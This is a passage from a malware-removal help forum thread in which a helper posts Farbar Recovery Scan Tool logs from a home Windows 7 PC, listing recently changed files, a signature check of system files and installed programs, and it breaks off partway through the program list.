2014-09-13 17:50 - 2012-03-25 12:25 - 00000000 ____D () C:\ProgramData\MFAData
2014-09-13 12:00 - 2014-09-13 12:00 - 02347384 _____ (ESET) C:\Users\Dale\Downloads\esetsmartinstaller_enu.exe
2014-09-13 11:54 - 2014-09-13 11:54 - 00231760 _____ () C:\Users\Dale\Downloads\CrucialScan.exe
2014-09-13 11:42 - 2009-07-13 21:37 - 00000000 __RHD () C:\Users\Default
2014-09-13 11:42 - 2009-07-13 21:37 - 00000000 ___RD () C:\Users\Public
2014-09-13 11:38 - 2014-09-13 10:19 - 00000000 ____D () C:\Windows\erdnt
2014-09-13 11:32 - 2012-03-24 10:28 - 00000000 ____D () C:\Users\Dale
2014-09-13 10:41 - 2014-09-13 10:41 - 00000000 ____D () C:\Users\Dale\Documents\ProcAlyzer Dumps
2014-09-13 10:40 - 2012-03-25 13:40 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy
2014-09-13 02:20 - 2014-09-13 10:18 - 01097728 _____ (Farbar) C:\Users\Dale\Desktop\FRST.exe
2014-09-13 02:19 - 2014-09-13 10:18 - 05577449 ____R (Swearware) C:\Users\Dale\Desktop\ComboFix.exe
2014-09-13 01:50 - 2014-09-13 01:38 - 00110296 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2014-09-13 01:36 - 2012-03-25 14:34 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-09-13 01:35 - 2012-03-25 14:36 - 00000000 ____D () C:\Users\Dale\AppData\Roaming\Malwarebytes
2014-09-13 01:34 - 2014-09-13 01:34 - 00001020 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-09-13 01:34 - 2014-09-13 01:34 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2014-09-13 01:34 - 2014-09-13 01:34 - 00000000 ____D () C:\Program Files\Malwarebytes Anti-Malware
2014-09-13 01:33 - 2014-09-13 01:33 - 17292760 _____ (Malwarebytes Corporation ) C:\Users\Dale\Downloads\mbam-setup-2.0.2.1012.exe
2014-09-13 01:29 - 2012-05-27 19:36 - 00000000 ____D () C:\Windows\pss
2014-09-13 00:33 - 2014-09-13 00:33 - 00007605 _____ () C:\Users\Dale\AppData\Local\Resmon.ResmonCfg
2014-09-13 00:13 - 2014-09-08 09:30 - 00196608 ____R () C:\Users\Dale\Desktop\Lawyers Abstract & Title Co.QBW.TLG
2014-09-13 00:13 - 2014-09-08 09:30 - 00000355 _____ () C:\Users\Dale\Desktop\Lawyers Abstract & Title Co.QBW.ND
2014-09-13 00:13 - 2013-06-03 10:04 - 118804480 ____R () C:\Users\Dale\Desktop\Lawyers Abstract & Title Co.QBW
2014-09-12 23:36 - 2012-03-24 10:31 - 00782510 _____ () C:\Windows\system32\PerfStringBackup.INI
2014-09-12 23:23 - 2014-08-22 15:38 - 00000000 ____D () C:\Program Files\Spybot - Search & Destroy 2
2014-09-12 21:54 - 2009-07-13 21:04 - 00450770 ____R () C:\Windows\system32\Drivers\etc\hosts.20140913-103855.backup
2014-09-12 20:01 - 2009-07-13 21:37 - 00000000 ____D () C:\Windows\Microsoft.NET
2014-09-12 19:04 - 2012-03-24 18:52 - 00000000 ____D () C:\ProgramData\Microsoft Help
2014-09-12 18:59 - 2013-07-13 18:02 - 00000000 ____D () C:\Windows\system32\MRT
2014-09-12 18:47 - 2012-03-24 19:36 - 98758480 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2014-09-12 18:46 - 2014-05-06 18:19 - 00000000 ___SD () C:\Windows\system32\CompatTel
2014-09-12 18:14 - 2014-09-12 18:14 - 00000000 ____D () C:\Users\Dale\AppData\Local\Microsoft_Corporation
2014-09-12 18:14 - 2014-09-04 11:33 - 00000618 _____ () C:\Users\Dale\Desktop\avgrep.txt
2014-09-08 12:49 - 2014-08-24 09:43 - 00000895 _____ () C:\Users\Public\Desktop\AVG 2014.lnk
2014-09-08 12:49 - 2013-11-14 09:51 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG
2014-09-08 12:48 - 2012-05-15 08:43 - 00000000 ____D () C:\$AVG
2014-09-04 20:52 - 2014-09-12 00:48 - 00445952 _____ (Microsoft Corporation) C:\Windows\system32\aepdu.dll
2014-09-04 20:47 - 2014-09-12 00:48 - 00302592 _____ (Microsoft Corporation) C:\Windows\system32\aeinv.dll
2014-09-03 07:34 - 2012-03-25 21:17 - 00000000 ____D () C:\Windows\options
2014-09-02 21:39 - 2013-07-09 21:46 - 00000000 ____D () C:\Program Files\Mozilla Maintenance Service
2014-09-02 21:16 - 2014-09-02 19:12 - 00181295 _____ () C:\Windows\system32\avgrep.txt
2014-09-02 21:05 - 2012-03-24 13:06 - 00000000 ____D () C:\Windows.old
2014-08-28 18:21 - 2009-07-13 23:33 - 00426472 _____ () C:\Windows\system32\FNTCACHE.DAT
2014-08-26 21:52 - 2012-08-15 07:52 - 01316352 ___SH () C:\Users\Dale\Documents\Thumbs.db
2014-08-26 18:37 - 2014-08-26 18:37 - 00000000 ____D () C:\ProgramData\Avg_Update_0814tb
2014-08-26 18:37 - 2014-08-26 18:37 - 00000000 ____D () C:\Program Files\AVG Security Toolbar
2014-08-25 17:36 - 2012-03-25 12:31 - 00000000 ____D () C:\Program Files\AVG Secure Search
2014-08-25 00:06 - 2014-08-24 09:36 - 00000000 ____D () C:\Users\Dale\AppData\Local\Avg2014
2014-08-24 09:47 - 2014-08-24 09:47 - 00000000 ____D () C:\Users\Dale\AppData\Roaming\AVG2014
2014-08-24 09:47 - 2012-03-25 12:28 - 00000000 ____D () C:\Program Files\AVG
2014-08-24 09:45 - 2014-08-24 09:39 - 00000000 ____D () C:\ProgramData\AVG2014
2014-08-24 09:43 - 2014-08-24 09:43 - 00000000 ____D () C:\Users\Dale\AppData\Roaming\TuneUp Software
2014-08-24 09:31 - 2014-08-24 09:30 - 00000000 ____D () C:\Program Files\Mozilla Firefox
2014-08-22 20:46 - 2014-08-28 00:19 - 00305152 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2014-08-22 19:42 - 2014-08-28 00:19 - 02352640 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2014-08-22 15:48 - 2009-07-13 21:04 - 00450770 ____R () C:\Windows\system32\Drivers\etc\hosts.20140912-215418.backup
2014-08-22 15:39 - 2014-08-22 15:39 - 00002091 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot-S&D Start Center.lnk
2014-08-22 15:39 - 2014-08-22 15:39 - 00002079 _____ () C:\Users\Public\Desktop\Spybot-S&D Start Center.lnk
2014-08-22 15:39 - 2014-08-22 15:38 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot - Search & Destroy 2
2014-08-22 15:37 - 2012-03-25 13:40 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot - Search & Destroy
2014-08-22 15:37 - 2012-03-25 13:40 - 00000000 ____D () C:\Program Files\Spybot - Search & Destroy
2014-08-22 15:35 - 2014-08-22 15:33 - 46525608 _____ (Safer-Networking Ltd. ) C:\Users\Dale\Downloads\spybot-2.4.exe
2014-08-20 06:51 - 2013-06-22 11:24 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Drive
2014-08-19 12:39 - 2014-09-12 19:00 - 00327872 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-08-18 17:26 - 2014-09-12 19:00 - 17455104 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-08-18 17:08 - 2014-09-12 19:00 - 04232704 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2014-08-18 16:57 - 2014-09-12 19:00 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-08-18 16:57 - 2014-09-12 19:00 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2014-08-18 16:46 - 2014-09-12 19:00 - 00454656 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2014-08-18 16:45 - 2014-09-12 19:00 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2014-08-18 16:44 - 2014-09-12 19:00 - 00061952 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2014-08-18 16:44 - 2014-09-12 19:00 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2014-08-18 16:42 - 2014-09-12 19:00 - 02185728 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2014-08-18 16:39 - 2014-09-12 19:00 - 00043008 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2014-08-18 16:39 - 2014-09-12 19:00 - 00032768 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2014-08-18 16:37 - 2014-09-12 19:00 - 00440320 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2014-08-18 16:36 - 2014-09-12 19:00 - 00112128 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2014-08-18 16:36 - 2014-09-12 19:00 - 00108032 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2014-08-18 16:35 - 2014-09-12 19:00 - 00597504 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2014-08-18 16:30 - 2014-09-12 19:00 - 00646144 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2014-08-18 16:27 - 2014-09-12 19:00 - 00365056 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2014-08-18 16:22 - 2014-09-12 19:00 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2014-08-18 16:19 - 2014-09-12 19:00 - 00164864 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2014-08-18 16:17 - 2014-09-12 19:00 - 00243200 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2014-08-18 16:17 - 2014-09-12 19:00 - 00069632 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2014-08-18 16:15 - 2014-09-12 19:00 - 11769856 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2014-08-18 16:09 - 2014-09-12 19:00 - 00603136 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2014-08-18 16:08 - 2014-09-12 19:00 - 02014208 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2014-08-18 16:08 - 2014-09-12 19:00 - 00673792 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2014-08-18 16:07 - 2014-09-12 19:00 - 01068032 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2014-08-18 15:46 - 2014-09-12 19:00 - 01812992 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2014-08-18 15:38 - 2014-09-12 19:00 - 01190400 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2014-08-18 15:36 - 2014-09-12 19:00 - 00678400 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2014-08-16 18:52 - 2014-02-09 11:10 - 00000000 ____D () C:\Program Files\Microsoft Silverlight
 
Files to move or delete:
====================
C:\Users\Dale\en_res.dll
C:\Users\Dale\es_res.dll
C:\Users\Dale\fr_res.dll
C:\Users\Dale\grm_res.dll
C:\Users\Dale\it_res.dll
C:\Users\Dale\jp_res.dll
C:\Users\Dale\mfc80u.dll
C:\Users\Dale\msvcr80.dll
C:\Users\Dale\PCPE Setup.exe
C:\Users\Dale\pt_res.dll
C:\Users\Dale\ru_res.dll
C:\Users\Dale\zh_res.dll
 
 
==================== Bamital & volsnap Check =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2014-09-06 17:15
 
==================== End Of Log ============================


#4 mpl006


Posted 14 September 2014 - 07:57 PM

I have lost connection with their computer.  As soon as I can get it back I will post the addition.txt.



#5 mpl006


Posted 14 September 2014 - 08:01 PM

Addition.txt:

 

Additional scan result of Farbar Recovery Scan Tool (x86) Version: 12-09-2014
Ran by Dale at 2014-09-14 19:26:41
Running from C:\Users\Dale\Desktop
Boot Mode: Normal
==========================================================
 
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: AVG AntiVirus Free Edition 2014 (Disabled - Up to date) {0E9420C4-06B3-7FA0-3AB1-6E49CB52ECD9}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Spybot - Search and Destroy (Disabled - Up to date) {9BC38DF1-3CCA-732D-A930-C1CA5F20A4B0}
AS: AVG AntiVirus Free Edition 2014 (Disabled - Up to date) {B5F5C120-2089-702E-0001-553BB0D5A664}
 
==================== Installed Programs ======================
 
(Only the adware programs with "hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
 Update for Microsoft Office 2007 (KB2508958) (HKLM\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{0C5823AA-7B6F-44E1-8D5B-8FD1FF0E6438}) (Version:  - Microsoft)
Adobe AIR (HKLM\...\Adobe AIR) (Version: 3.5.0.1060 - Adobe Systems Incorporated)
Adobe AIR (Version: 3.5.0.1060 - Adobe Systems Incorporated) Hidden
Adobe Flash Player 11 ActiveX (HKLM\...\Adobe Flash Player ActiveX) (Version: 11.9.900.170 - Adobe Systems Incorporated)
Adobe Flash Player 11 Plugin (HKLM\...\Adobe Flash Player Plugin) (Version: 11.9.900.170 - Adobe Systems Incorporated)
Adobe Reader X (10.1.4) (HKLM\...\{AC76BA86-7AD7-1033-7B44-AA1000000001}) (Version: 10.1.4 - Adobe Systems Incorporated)
Advertising Center (Version: 0.0.0.2 - Nero AG) Hidden
Akamai NetSession Interface (HKCU\...\Akamai) (Version:  - Akamai Technologies, Inc)
AOL Mail and AIM Gadget (HKLM\...\{F226C1DA-66D7-4ABC-86B5-3F978A660EBF}) (Version: 1.0.0 - AOL LLC)
AOL Registration (HKLM\...\AOL Regclient) (Version:  - )
AOL Toolbar (HKCU\...\AOL Toolbar) (Version:  - )
AOL Toolbar for Firefox (HKLM\...\AOL Toolbar for Firefox) (Version: 5.13.6.2 - AOL LLC)
AOL Uninstaller (Choose which Products to Remove) (HKLM\...\AOL Uninstaller) (Version:  - AOL LLC)
Apple Application Support (HKLM\...\{46F044A5-CE8B-4196-984E-5BD6525E361D}) (Version: 2.3.6 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{0592EF96-69D8-4E4B-9CC9-88F58EA86F01}) (Version: 7.0.0.117 - Apple Inc.)
Apple Software Update (HKLM\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Ask Toolbar (HKLM\...\{86D4B82A-ABED-442A-BE86-96357B70F4FE}) (Version: 1.14.1.0 - Ask.com) <==== ATTENTION
ATI Catalyst Install Manager (HKLM\...\{47FDEFC7-BFE6-FD75-41D1-28DD572BD2D9}) (Version: 3.0.715.0 - ATI Technologies, Inc.)
Audible Download Manager (HKLM\...\AudibleDownloadManager) (Version: 6.6.0.15 - Audible, Inc.)
AVG 2014 (HKLM\...\AVG) (Version: 2014.0.4765 - AVG Technologies)
AVG 2014 (Version: 14.0.4015 - AVG Technologies) Hidden
AVG 2014 (Version: 14.0.4765 - AVG Technologies) Hidden
AVG Security Toolbar (HKLM\...\AVG Secure Search) (Version: 18.1.9.799 - AVG Technologies)
Bonjour (HKLM\...\{79155F2B-9895-49D7-8612-D92580E0DE5B}) (Version: 3.0.0.10 - Apple Inc.)
Canon Easy-PhotoPrint EX (HKLM\...\Easy-PhotoPrint EX) (Version:  - )
Canon Easy-WebPrint EX (HKLM\...\Easy-WebPrint EX) (Version:  - )
Canon Inkjet Printer/Scanner/Fax Extended Survey Program (HKLM\...\CANONIJPLM100) (Version:  - )
Canon MG3100 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MG3100_series) (Version:  - )
Canon MG3100 series On-screen Manual (HKLM\...\Canon MG3100 series On-screen Manual) (Version:  - )
Canon MG3100 series User Registration (HKLM\...\Canon MG3100 series User Registration) (Version:  - )
Canon MP Navigator EX 5.0 (HKLM\...\MP Navigator EX 5.0) (Version:  - )
Canon My Printer (HKLM\...\CanonMyPrinter) (Version:  - )
Canon Solution Menu EX (HKLM\...\CanonSolutionMenuEX) (Version:  - )
Cassette2CD Wizard 2.02 (HKLM\...\{15CFEFBC-A542-4639-BA69-7BCDF65D194E}}_is1) (Version:  - )
Catalyst Control Center - Branding (Version: 1.00.0000 - ATI) Hidden
Catalyst Control Center Core Implementation (Version: 2010.0210.2339.42455 - ATI) Hidden
Catalyst Control Center Graphics Full Existing (Version: 2010.0210.2339.42455 - ATI) Hidden
Catalyst Control Center Graphics Full New (Version: 2010.0210.2339.42455 - ATI) Hidden
Catalyst Control Center Graphics Light (Version: 2010.0210.2339.42455 - ATI) Hidden
Catalyst Control Center Graphics Previews Common (Version: 2010.0210.2339.42455 - ATI) Hidden
Catalyst Control Center Graphics Previews Vista (Version: 2010.0210.2339.42455 - ATI) Hidden
Catalyst Control Center HydraVision Full (Version: 2010.0210.2339.42455 - ATI) Hidden
Catalyst Control Center InstallProxy (Version: 2010.0210.2339.42455 - ATI Technologies, Inc.) Hidden
Catalyst Control Center Localization All (Version: 2010.0210.2339.42455 - ATI) Hidden
CCC Help Chinese Standard (Version: 2010.0210.2338.42455 - ATI) Hidden
CCC Help Chinese Traditional (Version: 2010.0210.2338.42455 - ATI) Hidden
CCC Help Czech (Version: 2010.0210.2338.42455 - ATI) Hidden
CCC Help Danish (Version: 2010.0210.2338.42455 - ATI) Hidden
CCC Help Dutch (Version: 2010.0210.2338.42455 - ATI) Hidden
CCC Help English (Version: 2010.0210.2338.42455 - ATI) Hidden
CCC Help Finnish (Version: 2010.0210.2338.42455 - ATI) Hidden
CCC Help French (Version: 2010.0210.2338.42455 - ATI) Hidden
CCC Help German (Version: 2010.0210.2338.42455 - ATI) Hidden
CCC Help Greek (Version: 2010.0210.2338.42455 - ATI) Hidden
CCC Help Hungarian (Version: 2010.0210.2338.42455 - ATI) Hidden
CCC Help Italian (Version: 2010.0210.2338.42455 - ATI) Hidden
CCC Help Japanese (Version: 2010.0210.2338.42455 - ATI) Hidden
CCC Help Korean (Version: 2010.0210.2338.42455 - ATI) Hidden
CCC Help Norwegian (Version: 2010.0210.2338.42455 - ATI) Hidden
CCC Help Polish (Version: 2010.0210.2338.42455 - ATI) Hidden
CCC Help Portuguese (Version: 2010.0210.2338.42455 - ATI) Hidden
CCC Help Russian (Version: 2010.0210.2338.42455 - ATI) Hidden
CCC Help Spanish (Version: 2010.0210.2338.42455 - ATI) Hidden
CCC Help Swedish (Version: 2010.0210.2338.42455 - ATI) Hidden
CCC Help Thai (Version: 2010.0210.2338.42455 - ATI) Hidden
CCC Help Turkish (Version: 2010.0210.2338.42455 - ATI) Hidden
ccc-core-static (Version: 2010.0210.2339.42455 - ATI) Hidden
ccc-utility (Version: 2010.0210.2339.42455 - ATI) Hidden
CCleaner (HKLM\...\CCleaner) (Version: 3.16 - Piriform)
Creative DVD Audio Plugin for Audigy Series (HKLM\...\CTDVDAudio Plugin) (Version:  - )
Dell 2335dn MFP Software Uninstall (HKLM\...\Dell 2335dn MFP) (Version:  - DELL Inc.)
Download Updater (AOL LLC) (HKLM\...\SoftwareUpdUtility) (Version:  - ) <==== ATTENTION
Family Tree Maker 2011 (HKLM\...\Family Tree Maker 2011) (Version: 20.0.376 - Ancestry.com)
Family Tree Maker 2011 (Version: 20.0.376 - Ancestry.com) Hidden
Google Drive (HKLM\...\{C6640705-7479-4EE5-BC86-879F05F65E74}) (Version: 1.17.7290.4094 - Google, Inc.)
Google Earth (HKLM\...\{4D2A6330-2F8B-11E3-9C40-B8AC6F97B88E}) (Version: 7.1.2.2041 - Google)
Google Update Helper (Version: 1.3.24.15 - Google Inc.) Hidden
iCloud (HKLM\...\{20C6FF70-690B-4DF7-8F5D-269DD3A7FD23}) (Version: 3.0.2.163 - Apple Inc.)
Imaging ActiveX Control (HKLM\...\{468B0D45-CFEB-40AB-8245-89455F1DA7FE}) (Version: 2.0.1 - Software & Services)
ImagXpress (Version: 7.0.74.0 - Nero AG) Hidden
iTunes (HKLM\...\{C197BC08-3D82-4651-8886-E68C21578A38}) (Version: 11.1.3.8 - Apple Inc.)
Java Auto Updater (Version: 2.0.7.1 - Sun Microsystems, Inc.) Hidden
Java™ 6 Update 31 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F83216031FF}) (Version: 6.0.310 - Oracle)
Malwarebytes Anti-Malware version 2.0.2.1012 (HKLM\...\Malwarebytes Anti-Malware_is1) (Version: 2.0.2.1012 - Malwarebytes Corporation)
Menu Templates - Pack 1 (Version: 9.6.0.0 - Nero AG) Hidden
Menu Templates - Starter Kit (Version: 9.6.0.0 - Nero AG) Hidden
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 (Version: 4.5.50938 - Microsoft Corporation) Hidden
Microsoft Office 2007 Primary Interop Assemblies (HKLM\...\{50120000-1105-0000-0000-0000000FF1CE}) (Version: 12.0.4518.1014 - Microsoft Corporation)
Microsoft Office 2007 Service Pack 3 (SP3) (HKLM\...\{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}) (Version:  - Microsoft)
Microsoft Office 2007 Service Pack 3 (SP3) (Version:  - Microsoft) Hidden
Microsoft Office Access MUI (English) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Access Setup Metadata MUI (English) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Enterprise 2007 (HKLM\...\ENTERPRISE) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office Enterprise 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Excel MUI (English) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office File Validation Add-In (HKLM\...\{90140000-2005-0000-0000-0000000FF1CE}) (Version: 14.0.5130.5003 - Microsoft Corporation)
Microsoft Office Groove MUI (English) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Groove Setup Metadata MUI (English) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office InfoPath MUI (English) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office OneNote MUI (English) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Outlook MUI (English) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office PowerPoint MUI (English) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (English) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (French) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Proof (Spanish) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Proofing (English) 2007 (Version: 12.0.4518.1014 - Microsoft Corporation) Hidden
Microsoft Office Proofing Tools 2007 Service Pack 3 (SP3) (Version:  - Microsoft) Hidden
Microsoft Office Publisher MUI (English) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared MUI (English) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Shared Setup Metadata MUI (English) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Office Word MUI (English) 2007 (Version: 12.0.6612.1000 - Microsoft Corporation) Hidden
Microsoft Primary Interoperability Assemblies 2005 (HKLM\...\{D24DB8B9-BB6C-4334-9619-BA1C650E13D3}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft VC9 runtime libraries (Version: 1.0.0 - AOL LLC) Hidden
Microsoft VC9 runtime libraries (Version: 2.0.0 - AOL Inc.) Hidden
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual Studio 2005 Tools for Office Runtime (Version: 8.0.60940.0 - Microsoft Corporation) Hidden
Microsoft WSE 3.0 Runtime (HKLM\...\{E3E71D07-CD27-46CB-8448-16D4FB29AA13}) (Version: 3.0.5305.0 - Microsoft Corp.)
Movie Templates - Starter Kit (Version: 9.6.0.0 - Nero AG) Hidden
Mozilla Firefox 28.0 (x86 en-US) (HKLM\...\Mozilla Firefox 28.0 (x86 en-US)) (Version: 28.0 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 28.0 - Mozilla)
MSXML 4.0 SP2 (KB954430) (HKLM\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
MSXML 4.0 SP2 Parser and SDK (HKLM\...\{716E0306-8318-4364-8B8F-0CC4E9376BAC}) (Version: 4.20.9818.0 - Microsoft Corporation)
Nero 9 Essentials (HKLM\...\{22053dad-7249-4da3-9254-fcada5927286}) (Version:  - Nero AG)
Nero BurnRights (Version: 3.4.13.100 - Nero AG) Hidden
Nero BurnRights Help (Version: 3.4.4.100 - Nero AG) Hidden
Nero ControlCenter (Version: 9.0.0.1 - Nero AG) Hidden
Nero CoverDesigner (Version: 4.4.23.100 - Nero AG) Hidden
Nero DiscSpeed (Version: 5.4.13.100 - Nero AG) Hidden
Nero DriveSpeed (Version: 4.4.12.100 - Nero AG) Hidden
Nero Express Help (Version: 9.4.39.100 - Nero AG) Hidden
Nero InfoTool (Version: 6.4.12.100 - Nero AG) Hidden
Nero Installer (Version: 4.4.9.0 - Nero AG) Hidden
Nero Online Upgrade (Version: 1.3.0.0 - Nero AG) Hidden
Nero ShowTime (Version: 5.4.27.100 - Nero AG) Hidden
Nero StartSmart (Version: 9.4.40.100 - Nero AG) Hidden
Nero StartSmart Help (Version: 9.4.40.100 - Nero AG) Hidden
Nero Vision (Version: 6.4.19.100 - Nero AG) Hidden
Nero Vision Help (Version: 6.4.15.100 - Nero AG) Hidden
NeroExpress (Version: 1.0.0.0 - Nero AG) Hidden
neroxml (Version: 1.0.0 - Nero AG) Hidden
PaperPort Image Printer (HKLM\...\{2BC2781A-F7F6-452E-95EB-018A522F1B2C}) (Version: 1.00.0000 - Nuance Communications, Inc.)
Photo Transfer App (HKLM\...\com.erclab.air.phototransferapp) (Version: 2.0.0 - UNKNOWN)
Photo Transfer App (Version: 2.0.0 - UNKNOWN) Hidden
PowerChute Personal Edition 3.0.2 (HKLM\...\{8ED262EE-FC73-47A9-BB86-D92223246881}) (Version: 3.0.2 - Schneider Electric)
QuickBooks (Version: 19.0.4014.705 - Intuit Inc.) Hidden
QuickBooks Pro 2009 (HKLM\...\{9A2F0810-3622-4E86-9072-973FBE1679C5}) (Version: 19.0.4014.705 - Intuit Inc.)
QuickTime (HKLM\...\{B67BAFBA-4C9F-48FA-9496-933E3B255044}) (Version: 7.74.80.86 - Apple Inc.)
RegZooka (HKLM\...\RegZooka) (Version: 2.96 - ZookaWare)
ScanSoft PaperPort 11 (HKLM\...\{848E36E7-0784-49C3-81F4-DD946ABAF46A}) (Version: 11.1.0000 - Nuance Communications, Inc.)
Skins (Version: 2010.0210.2339.42455 - ATI) Hidden
Spybot - Search & Destroy (HKLM\...\{B4092C6D-E886-4CB2-BA68-FE5A99D31DE7}_is1) (Version: 2.4.40 - Safer-Networking Ltd.)
SupportSoft Assisted Service (HKLM\...\{5A3F6A80-7913-475E-8B96-477A952CFA43}) (Version: 15 - SupportSoft)
